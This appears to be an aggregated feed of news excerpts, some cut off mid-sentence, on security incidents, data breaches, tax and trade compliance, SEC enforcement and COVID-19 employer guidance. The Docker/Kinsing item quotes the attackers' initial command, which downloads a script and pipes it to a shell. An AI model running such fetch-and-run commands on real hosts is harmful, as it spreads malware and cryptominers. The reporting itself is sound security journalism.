An aggregate of all of GoVanguard’s InfoSec & Cybersecurity related Posts, News, Threats and Data Feeds.

As the coronavirus pandemic continues to worsen, remote-collaboration platforms – now fixtures in many workers’ “new normal” – are facing more scrutiny. Popular video-conferencing app Zoom may currently be in the cybersecurity hot seat, but other collaboration tools, such as Slack, Trello, WebEx and Microsoft Teams, are certainly not immune from cybercriminal attention. For organizations leaning on these platforms, security should be top of mind. A failure to lock down Slack et al could lead to data breaches, brand damage, malware infestations and more. Researchers say that attackers are hard at work looking for new weaknesses to achieve all of the latter. Fortunately though, best practices can go a long way to shrinking the risk. Collaboration App Security Bugs: Not Hypothetical The risk posed by collaboration platforms is far from hypothetical. In March, for example a critical vulnerability was found in Slack, which could allow automated account takeovers (ATOs) and lead to data breaches. According to a HackerOne bug-bounty report, a HTTP Request Smuggling bug, in a proof-of-concept, was used to force open-redirects within Slack, leading users to a rogue client outfitted with Slack domain cookies. When victims attached to the malicious client, their session cookies could be harvested and later used to take over accounts. The attack could also be automated. “Automated account takeover attacks, like Slack just had to deal with, are pervasive,” said Jason Kent,…


In January 2020, the Spanish mobile phone forum HTC Mania suffered a data breach of the vBulletin based site. The incident exposed 1.5M member email addresses, usernames, IP addresses, dates of birth and salted MD5 password hashes and password histories. Data from the breach was subsequently redistributed on popular hacking websites.


On Thursday, February 13, the OECD presented a webcast which provided a status report on the development of an impact assessment of the anticipated tax collections and economic consequences of the proposed Pillar One and Pillar Two revisions to the international tax framework. Businesses (and presumably governments even more so) have been eagerly anticipating a readout on this work, as one of the hallmarks of OECD policy making always has been to base policy decisions on rigorous economic analysis.

To its credit, the OECD is attempting to tackle one of the most challenging aspects of tax revenue estimation, namely the effect of behavioral changes encouraged by new law. The status report suggested that two possible behavioral changes could be that multinational enterprises reduce their profit shifting intensity, and that some low-tax jurisdictions increase their corporate income tax rate.

The headline figures are eye-catching; the estimate at the moment is that Pillar One and Pillar Two in combination would result in an overall increase of annual corporate tax collections of up to USD 100 billion, or 4% of current corporate income tax collections. The analysis indicates that tax revenue gains would be broadly similar across high-, middle-, and low-income economies. The report projects that the only group of countries that would lose tax revenue in the aggregate under Pillar One (i.e., the ‘‘surrender states,’’ which would surrender tax rights over income that will be allocated to other jurisdictions) would be ‘‘investment hubs.’’ More than half of the Pillar One reallocated profit would come from 100 MNE groups. The OECD also expects that all three country groups — high, medium, and low income — would see an increase in corporate tax collections under Pillar Two.


Article first published in Bloomberg Tax: Tax Management International Journal on 13 March 2020.

The post OECD Provides Status Report on Pillars One and Two Impact Assessment – Where Is the Money Coming From? appeared first on Global Compliance News.


SEC 2020: Expect SEC Enforcement to Cast Wide Net on Corporate Disclosure

This is the second installment in our series of year-end analyses of the year in securities regulation and enforcement.

Based on our ongoing analysis of SEC enforcement actions in 2019, we expect the SEC’s Division of Enforcement to continue its expansive view of company disclosure issues that warrant enforcement scrutiny. In 2019, the SEC was aggressive against alleged accounting fraud by public companies and their executives, including actions alleging accounting schemes to meet earnings expectations and actions alleging sham transactions with third parties. Consistent with this focus on accounting misstatements, the SEC also brought stand-alone actions for internal control deficiencies. In addition, the Commission brought actions against outside auditors for recurrent audit failures and violation of auditor independence rules.

Expanding beyond this traditional focus, the SEC investigated companies for alleged misstatements or omissions involving non-accounting issues, such as data privacy breaches and cyber-related violations, as well as other non-technology negative developments affecting a company’s core operations. The SEC also brought actions against companies that were already sanctioned by other non-securities regulators. Finally, the SEC expanded its enforcement reach to foreign companies with securities that are primarily listed overseas, as long as the Enforcement Staff could find a US jurisdictional hook to sue such companies and their executives⁠—a trend we have seen continue into recent weeks.

The post US: Looking Back & Looking Ahead: A Series of Analyses of the Past Year in Financial Regulation and Enforcement and What to Expect in the Coming Year appeared first on Global Compliance News.


Read publication

Welcome to the March 2020 edition of Baker McKenzie’s International Trade Compliance Update.

This issue’s highlights:

  • WTO: trade policy review (EU), disputes, TBT notifications
  • WCO: agenda for 65th HSC, news
  • Other International Matters: CITES notifications, FAS Gain Reports
  • Panama: Official Gazette updates
  • Canada: consultations on WTO investment framework, comprehensive review of TRQs, consultation on possible modernization of Canada-Ukraine FTA, Canada’s post Brexit agreements with EU, Canada Gazette, restrictive measures, AD/CVD, advance rulings, notices and D-Memoranda
  • Mexico: Diario Oficial, AD/CVD
  • United States: Presidential documents, report on WTO Appellate Body, designation of LDCs under CVD law, sugar TRQs, ITC investigations, Sec. 232 and 301 updates, exclusions and guidance, CAFC upholds Sec. 232, import restrictions – Ecuador, Yemen, Jordan; CBP/TSA arrival restrictions, CBP documents, CBP ruling revocations/modifications, CSMS updates, FTZs, non-proliferation measures, natural gas export authorizations extended, BIS EAR revisions for Yemen and Russia, Huawei temporary licenses, information requested on CWC impact, Venezuela sanctions, Mali sanctions, boycotts, investment regulations updates, regulatory updates, APHIS updates, AD/CVD scope rulings, anti-circumvention determinations, AD/CVD cases
  • Argentina: Boletin Oficial, AD/CVD
  • Brazil: CAMEX, SECEX, AD/CVD ma ters
  • Chile, Peru, Colombia: regulatory updates
  • Australia: MOFCOM/GAC Notices, Peru-Australia FTA, Australia-Hong Kong FTA, AD/CVD cases
  • China: Tariff Commission announcements, countermeasures exclusions and tariff reductions, AD/CVD announcements, Hong Kong SAR notices
  • India: CBIC and DGFT notices, circulars and instructions, AD/CVD
  • Indonesia: e-Commerce, Indonesia-Australia FTA
  • New Zealand: restrictions on laser pointers, vehicle import requirements
  • Singapore: rules for FTZ
  • EU: EU-Vietnam FTA approved by Euro. Parliament, withdrawal of Cambodia preferences, classification rulings, CN EN updates, OJ documents, restrictive measures, AD/CVD
  • France: notice to importers
  • Switzerland: OFAC approved humanitarian trade arrangement, regulatory requirements, restrictive measures
  • Other EU-EFTA countries: regulatory requirements, restrictive measures
  • United Kingdom: statutory instruments, post-Brexit import controls, consultation on post-Brexit tariff regimes, export inspection procedures, HMRC updates, notices
  • Turkey: communiques and regulations
  • Ukraine: cancelation of special economic sanctions, legislation
  • Morocco: tax regime
  • EAEU: Board and Council Решения, classification preliminary decision
  • South Africa: Tariff amendments
  • Senegal: promoting start-ups
  • Togo: audio-visual communications
  • plus information on newsletters, webinars.

Plus information on Client Alerts and articles, webinars and seminars, and recordings of past events.

The post March 2020 International Trade Compliance Update appeared first on Global Compliance News.


Mozilla patched two Firefox browser zero-day vulnerabilities actively being exploited in the wild. The flaws, both use-after-free bugs, have been part of “targeted attacks in the wild,” according to a Mozilla Foundation security advisory posted Friday. Both bugs have critical ratings and allow remote attackers to execute arbitrary code or trigger crashes on machines running Firefox 74.0.1 and its business-friendly Firefox Extended Support Release 68.6.1. The bugs impact Firefox browser versions running on Windows, macOS and Linux operating systems. Details are scant on how either bug (CVE-2020-6819 and CVE-2020-6820) are specifically being exploited by adversaries. Tracked as CVE-2020-6819, this bug is a use-after free vulnerability tied to the browser component “nsDocShell destructor”. The Firefox nsDocShell is a client of the nsI-HttpChannel API, a function of the browser related to reading HTTP headers. The second vulnerability, tracked as CVE-2020-6820, is also a use-after-free bug actively being exploited in the wild. In this case, the attackers are targeting the Firefox browser component ReadableStream, an interface of the Streams API. The Streams API is “responsible for breaking a resource that you want to receive over a network down into small chunks,” according to Mozilla. Bugs were reported by security researchers Francisco Alonso and Javier Marcos of JMP Security. “There is still lots of work to do and more details to be published (including other browsers). Stay…


The rapid spread of the 2019 Novel Coronavirus (COVID-19) is disrupting business (and life) everywhere. As new clusters are identified across Europe and the Middle East, fears of the virus are impacting the US stock market and there are concerns of a global pandemic.

With no end in sight, many US companies are questioning what policies and practices they need to put in place, and revisiting those that they may already have in place to deal with this rapidly evolving situation. We recommend that companies take the following steps now.

Next Steps for Employers

  • Emergency Preparation Team. Assemble a cross-functional emergency management team to handle issues such as employee health and safety, internal and external communications, medical leaves, personal leaves and disability accommodations, technology support, and legal compliance. As the situation continues to develop, it will become increasingly important to have a single team that is aware of all potential virus-related issues for consistency and precedent-setting purposes.
  • Decision Making Authority. The team should include responsible persons from the relevant departments (e.g., HR, IT, legal, communications, etc.), and should be or have access to decision makers who can make immediate decisions on office closures, leave requests, working from home policies, etc.
  • Pandemic Policy. The company should review its current emergency management policies. If it does not have a pandemic policy, it should develop one. Depending on the location, the company may have an analogous policy or experience with other business disruptions as a starting point (e.g., for earthquakes, floods, wildfires, hurricanes, strikes, etc.). This will likely include an emergency communication protocol, as well as procedures for closing and opening offices, working with limited staff, etc. In some companies, this could also include additional technical support to allow employees to work remotely, and HR and communication support to ensure that employees are being treated fairly and that the company is as consistent as possible in its messaging. •
  • Safety Awareness. The team should also closely monitor the relevant health guidelines from the relevant government and non-government authorities, such as the US Centers for Disease Control and Prevention (CDC). Workplaces should prioritize basic disease prevention measures, like promoting proper hygiene and actively encouraging workers to stay home if they’re not feeling well. CDC has additional strategies such as:
    • Place posters that encourage staying home when sick, cough and sneeze etiquette, and hand hygiene at the entrance of workplaces and in other workplace areas where they are likely to be seen.
    • Provide tissues and no-touch disposal receptacles for use by employees.
    • Instruct employees to clean their hands often with an alcohol-based hand sanitizer that contains at least 60-95% alcohol, or wash their hands with soap and water for at least 20 seconds. Soap and water should be used preferentially if hands are visibly dirty.
    • Provide soap and water and alcohol-based hand rubs in the workplace. Ensure that adequate supplies are maintained. Place hand rubs in multiple locations or in conference rooms to encourage hand hygiene.
    • Perform routine environmental cleaning. Routinely clean all frequently touched surfaces in the workplace, such as workstations, countertops, and doorknobs. Provide disposable wipes so that commonly used surfaces (for example, doorknobs, keyboards, remote controls, desks) can be wiped down by employees before each use.
  • Sick Leave. We generally advise that companies follow their existing medical and sick leave policies, but modified as recommended by the public health authorities. For example, in the US the CDC specifically recommends that companies:
    • Ensure that sick leave policies are flexible and consistent with public health guidance;
    • Develop “non-punitive leave policies” so that sick employees do not feel pressured to come into work where they can infect others;
    • Loosen requirements for a doctor’s note for employees to validate a respiratory illness or to return to work; and
    • Maintain flexible policies that permit employees to stay home to care for a sick family member.
  • Travel Restrictions. Companies are starting to take more proactive measures to prepare for a wider outbreak. Implementing business and personal travel policies is advisable. Currently, recommendations are as follows:
    • The CDC recommends that travelers avoid all nonessential travel to and from mainland China, Iran, South Korea and Italy. The CDC recommends that older adults or those who have chronic medical conditions consider postponing travel to Japan; and travelers should take usual precautions with regard to travel to and from Hong Kong. Of course additional countries may be added to the list based on emerging information regarding the spread of virus.
    • Consider instructing employees who have visited the above-noted restricted countries/regions or have been in close contact with someone who has been in those countries/regions within the last 14 days to promptly disclose their travel or contact history to their supervisor to determine if it is appropriate to work from home for a period of time.
    • Consider video conferencing as an alternative to foreign travel.
    • Look ahead to future big meetings and events to assess safety and to consider alternatives.
  • Visitor Policies. With respect to guests and visitors, companies are beginning to develop screening policies for clients, guests and other visitors, as well as limiting access to social visitors to company sites. This is an evolving issue, but we know that in jurisdictions that are at a higher risk level, companies can do so. Here in the US, it’s a little more difficult for a variety of reasons, in part because COVID-19 has not yet been designated as a “pandemic,” so all of the normal privacy, accommodation, etc. rules still apply. If, though, COVID-19 becomes a “direct threat” to US workplaces, then companies will likely have greater leeway to make inquiries to protect workplaces.
  • Cost-Cutting Strategies. Be forward-thinking. COVID-19 will impact the bottom line. As the economy braces for a coronavirus challenge, many companies may be forced to cut costs. Layoffs, furloughs and reducing labor costs are invariably top of mind. And, because international labor and employment rules are vastly different from those inside the US, it is vital in-house counsel and human resources professionals wear a global hat when approaching these changes. What works from a US point of view may not work internationally. Companies should be mindful of the differences as they plan cost-cutting measures involving their employees.

The post COVID-19: Essential Action Items for US Employers to Take Now appeared first on Global Compliance News.


In April 2020, the account hijacking and SIM swapping forum OGUsers suffered their second data breach in less than a year. As with the previous breach, the exposed data included email and IP addresses, usernames, private messages and passwords stored as salted MD5 hashes. A total of 263k email addresses across user accounts and other tables were posted to a rival hacking forum.


The Docker cloud containerization technology is under fire, with an organized, self-propagating cryptomining campaign targeting misconfigured open Docker Daemon API ports. Thousands of container-compromise attempts are being observed every day as part of the campaign, according to Gal Singer, a security researcher at AquaSec. The effort has been ongoing for months. However, since the beginning of the year, the number of daily attempts has far exceeded what was seen before, he said. “We…believe that these attacks are directed by actors with sufficient resources and the infrastructure needed to carry out and sustain such attacks, and that this is not an improvised endeavor,” he wrote, in an analysis posted on Friday. Kinsing’s Infection Routine The attack pattern starts with the attackers identifying a misconfigured Docker API port that has been left open to the public internet. They then access that open port and the Docker instance connected to it, and run a rogue Ubuntu container. The container issues a command that fetches the Kinsing malware, which in turn downloads and runs a cryptominer. In the final stage of the infection, Kinsing attempts to propagate to other containers and hosts. Click to enlarge: A summary of the attack components. Source: AquaSec. The same initial command is used in every attack, according to Singer: “/bin/bash -c apt-get update && apt-get install -y wget cron;service cron start; wget -q -O – | sh;tail -f /dev/null.” This…


A group of tech giants – including Akamai, Amazon Web Services, Cloudflare, Facebook, Google, Microsoft and Netflix – are banding together to battle route hijacking, route leaks and IP address-spoofing attacks targeting internet users. They’re coming together under a program was introduced this week by the Mutually Agreed Norms for Routing Security (MANRS) global initiative. MANRS over the past six years has worked to build up a team of 300 network operators, internet exchange points (IXPs) and other companies to provide “crucial fixes to reduce the most common routing threats.” MANRS’ latest program brings in content delivery networks (CDNs), like Akamai and Cloudflare, which are geographically distributed groups of servers that provide quick delivery of internet content worldwide. Also included are cloud providers like Microsoft and AWS, which offer network services, infrastructure or cloud-based applications via the internet or private interconnections. Members in the program are tasked with taking specific steps to improve the resilience and security of the routing infrastructure. The internet routing process is complex; exchanged traffic for instance runs on Border Gateway Protocol (BGP), a protocol that joins different networks together to build a “roadmap” of the internet. BGP however does not have built-in validation mechanisms, which can expose businesses to attacks such as route hijacking, route injection attacks, IP address spoofing and more, which allow…